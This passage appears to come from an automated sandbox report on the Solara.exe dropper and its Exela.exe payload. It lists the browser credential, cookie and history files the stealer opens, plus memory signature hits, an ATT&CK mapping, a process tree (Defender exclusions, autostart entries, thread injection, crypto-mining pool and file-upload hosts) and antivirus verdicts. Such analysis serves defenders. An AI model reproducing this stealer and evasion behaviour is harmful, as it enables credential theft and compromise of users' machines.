                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\tmp
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.files
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\default
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumps
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
Source: Yara match | File source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000002.2093996201.0000019BB72E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000002.2087167617.0000019BB60C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000002.2086690451.0000019BB5FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 0000004D.00000003.2068669850.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000003.2070969941.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000003.2072039698.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000002.2083587274.0000019BB56B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000003.2074477936.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000002.2084894174.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000003.2069028034.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000002.2086690451.0000019BB5FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000002.2083587274.0000019BB56B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000002.2086690451.0000019BB5FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix, listed by tactic (techniques flagged for this sample carry the report's numeric badge in brackets):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
Execution: Windows Management Instrumentation [241], Native API [2], Command and Scripting Interpreter [2], Service Execution [1], PowerShell [2], Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell
Persistence: DLL Side-Loading [1], Windows Service [11], Registry Run Keys / Startup Folder [221], Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Privilege Escalation: DLL Side-Loading [1], Windows Service [11], Process Injection [111], Registry Run Keys / Startup Folder [221], Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Defense Evasion: Disable or Modify Tools [21], Deobfuscate/Decode Files or Information [1], Obfuscated Files or Information [21], Software Packing [11], Timestomp [1], DLL Side-Loading [1], File Deletion [1], Masquerading [11], Virtualization/Sandbox Evasion [151], Process Injection [111]
Credential Access: OS Credential Dumping [1], LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
Discovery: System Time Discovery [2], File and Directory Discovery [3], System Information Discovery [44], Security Software Discovery [26], Process Discovery [1], Virtualization/Sandbox Evasion [151], Application Window Discovery [1], System Network Configuration Discovery [1], Network Sniffing, Network Service Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot
Collection: Archive Collected Data [1], Data from Local System [2], Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
Command and Control: Ingress Tool Transfer [3], Encrypted Channel [11], Non-Application Layer Protocol [4], Application Layer Protocol [5], Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Data Encrypted for Impact [1], Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement
Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Behavior Graph ID: 1589392; Sample: Solara.exe; Startdate: 12/01/2025; Architecture: WINDOWS; Score: 100

Process tree from the behavior graph (each node lists its DNS/IP contacts, dropped files, matched signatures and the processes it started; the figures after a process name are the created-registry-value and created-file counts shown on the graph, see legend):

Start (Solara.exe)
  DNS/IP: store1.gofile.io; pool.hashvault.pro; 3 other IPs or domains
  Signatures: Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 15 other signatures
  Started:
    Solara.exe (2 4)
      Dropped: C:\Users\user\AppData\Local\Temp\Solara.exe (PE32+); C:\Users\user\AppData\Local\Temp\Exela.exe (PE32+); C:\Users\user\AppData\...\Solara.exe.log (CSV)
      Signatures: Creates multiple autostart registry keys; Bypasses PowerShell execution policy; Adds a directory exclusion to Windows Defender
      Started:
        Exela.exe
          Dropped: C:\Users\...\_quoting_c.cp310-win_amd64.pyd (PE32+); C:\Users\user\AppData\...\unicodedata.pyd (PE32+); C:\Users\user\AppData\Local\...\sqlite3.dll (PE32+); 30 other files (29 malicious)
          Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Drops PE files to the startup folder
          Started:
            Exela.exe
              DNS/IP: ip-api.com 208.95.112.1, 49982, 80 TUT-ASUS United States; api.gofile.io 51.91.7.6, 443, 49990 OVHFR France; 4 other IPs or domains
              Dropped: C:\Users\user\AppData\Local\...\Exela.exe (PE32+); C:\ProgramData\Microsoft\...\Exela.exe (PE32+); C:\Users\user\AppData\...\LIJDSFKJZG.xlsx (ASCII); 2 other malicious files
              Signatures: Tries to harvest and steal browser information (history, passwords, etc); Detected generic credential text file; Modifies existing user documents (likely ransomware behavior)
              Started:
                Conhost.exe
                  Started: Conhost.exe
                Conhost.exe
                  Started: Conhost.exe
        Solara.exe (1 2)
          Dropped: C:\ProgramData\...\rdqanwpudvuj.exe (PE32+)
          Signatures: Uses powercfg.exe to modify the power settings; Adds a directory exclusion to Windows Defender; Modifies power options to not sleep / hibernate
          Started:
            15 other processes
              Signatures: Loading BitLocker PowerShell Module
              Started: conhost.exe; conhost.exe; 15 other processes
        powershell.exe (23)
          Signatures: Loading BitLocker PowerShell Module
          Started: conhost.exe
        2 other processes
          Started: conhost.exe
    rdqanwpudvuj.exe
      Dropped: C:\Windows\Temp\ypynqohyxqjk.sys (PE32+)
      Signatures: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Modifies the context of a thread in another process (thread injection); 3 other signatures
      Started:
        powershell.exe
          Started: conhost.exe
        cmd.exe
          Started: 3 other processes
        powercfg.exe
          Started: 2 other processes
        10 other processes
          DNS/IP: 80.240.16.67, 443, 49857 AS-CHOOPAUS Germany
          Started: 8 other processes
    Solara.exe
      Signatures: Suspicious powershell command line found
      Started:
        powershell.exe
          Started:
            2 other processes
              Signatures: Adds a directory exclusion to Windows Defender
              Started:
                powershell.exe
                  Signatures: Loading BitLocker PowerShell Module
                  Started: conhost.exe
                cmd.exe
                  Started: conhost.exe; wusa.exe
                sc.exe
                  Started: conhost.exe
                Conhost.exe
    2 other processes
      Signatures: Changes security center settings (notifications, updates, antivirus, firewall)

Source | Detection | Scanner | Label | Link
Solara.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.Cassiopeia |
Solara.exe | 100% | Avira | TR/Dropper.Gen |
Solara.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe | 100% | Avira | HEUR/AGEN.1306040 |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe | 100% | Avira | HEUR/AGEN.1306040 |
C:\Users\user\AppData\Local\Temp\Exela.exe | 100% | Avira | HEUR/AGEN.1306040 |
